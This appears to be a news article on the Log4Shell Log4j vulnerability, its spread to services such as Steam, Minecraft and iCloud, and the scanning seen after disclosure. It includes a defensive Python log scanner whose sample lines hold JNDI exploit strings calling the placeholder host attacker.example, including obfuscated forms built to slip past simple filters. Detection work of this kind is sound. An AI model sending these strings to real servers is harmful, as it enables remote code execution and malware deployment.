Worldwide Log4j Attacks That Can Deploy Malware Affect Steam, Minecraft, and iCloud

  • A previously unknown vulnerability called Log4Shell is being patched across large and small companies.
  • Millions of applications use Log4j, and this zero-day gives an attacker remote code execution and the ability to deploy malware.
  • At the moment, Minecraft, Steam, and iCloud have been confirmed vulnerable.

Security teams at large and small companies are patching a previously unknown vulnerability that was publicly disclosed early Friday morning and could allow hackers to take over millions of devices on the internet. Log4Shell is a zero-day vulnerability in Apache Log4j, the Java-based logging library, that lets a remote attacker set their browser's user agent to a specially crafted string; once a vulnerable server logs that string, the attacker can execute commands on it and deploy malware.
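The mechanism described above is what defenders look for in their own logs: a lookup string such as `${jndi:...}` arriving in a logged field like the user agent. The following is an added detection example, not code from the article or from any of the vendors it names. It scans a handful of constructed web-server log lines (placeholder IPs and hostnames), folds the common `${lower:...}` and `${...:-...}` nesting tricks back into their plain form so they do not slip past a naive substring match, and reports which lines carry a JNDI lookup and with which scheme.

```python
import re

# Constructed sample access-log lines for demonstration; the IPs are from the
# 203.0.113.0/24 documentation range and the hostnames are placeholders.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [10/Dec/2021:18:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.11 - - [10/Dec/2021:18:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.12 - - [10/Dec/2021:18:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://attacker.example/b}"',
    '203.0.113.13 - - [10/Dec/2021:18:00:04 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.14 - - [10/Dec/2021:18:00:05 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

# Lookup wrappers that evaluate to a plain string and are used to split the
# word "jndi" so that a literal "${jndi:" search misses it:
#   ${lower:j} / ${upper:j}  -> "j"
#   ${anything:-j}           -> "j"   (default-value syntax, e.g. ${::-j})
_LOOKUP_WRAPPERS = [
    (re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE), lambda m: m.group(1)),
    (re.compile(r"\$\{[^{}]*:-([^{}]*)\}"), lambda m: m.group(1)),
]

# After normalisation a lookup reads "${jndi:<scheme>://...}"; capture the scheme.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?")


def normalize(text: str) -> str:
    """Collapse nested string-producing lookups until nothing changes, then lowercase.

    Each substitution removes one "${...}" wrapper, so the loop always terminates.
    """
    previous = None
    while previous != text:
        previous = text
        for pattern, replacement in _LOOKUP_WRAPPERS:
            text = pattern.sub(replacement, text)
    return text.lower()


def scan_line(line: str):
    """Return a finding dict if the line carries a JNDI lookup, else None."""
    normalized = normalize(line)
    match = JNDI_LOOKUP.search(normalized)
    if not match:
        return None
    return {
        "source": line.split()[0],            # client IP, first field of the access log
        "scheme": match.group(1) or "unknown",
        "obfuscated": normalized != line.lower(),  # True if a wrapper had to be unfolded
        "raw": line,
    }


def scan_log(lines):
    """Run scan_line over an iterable of log lines and collect the findings."""
    return [finding for finding in (scan_line(l) for l in lines) if finding]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        flag = "obfuscated" if f["obfuscated"] else "plain"
        print(f'{f["source"]}  jndi scheme={f["scheme"]}  ({flag})')
```

The benign `${date:yyyy}` line is deliberately included: Log4j's lookup syntax appears in legitimate traffic, so the rule keys on `jndi:` specifically rather than on `${` alone. A hit tells you a lookup string reached a logged field, not that the server was vulnerable or that the lookup resolved; use it to prioritise which hosts to check for an unpatched Log4j and to pull the source address into your triage.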

Thousands of apps and services use the open-source Log4j logging library; because nearly every network and security system needs a logging component, Log4j is very widely deployed. Although the Log4j 2.15.0 update is available, threat actors have already managed to exfiltrate data, install malware, or take over vulnerable servers.

Security researcher Marcus Hutchins said on Twitter that millions of applications use Log4j and that an attacker only has to get one of them to log a special string. Steam, Minecraft, and iCloud are confirmed to be susceptible to remote code execution (RCE) at the moment.

Amazon, Apple, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft use Log4j as a logging package. For example, attackers have used specially crafted messages pasted into the Minecraft chat box to gain remote code execution access.

Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys, said that the Apache Log4j zero-day is of high severity and probably the most critical vulnerability Qualys has seen this year.

GreyNoise reported numerous internet scanners searching for vulnerable machines. Cloudflare reported seeing 20,000 exploit requests per minute at 6:00 PM UTC on Friday, most of which originated in Canada, the US, the Netherlands, France, and the UK.

Because of the range of delivery mechanisms and the diversity of vulnerable applications, the risk is far from contained. The attack string does not even have to arrive directly over the internet: it can be delivered physically, for example hidden in a QR code scanned by a package delivery company. Log4Shell remains a threat until every vulnerable machine is updated.

A fully automated and extensive scanner for the Log4j RCE (CVE-2021-44228) is available on GitHub; it is well suited to companies scanning their own infrastructure and testing whether their WAF rules can be bypassed.
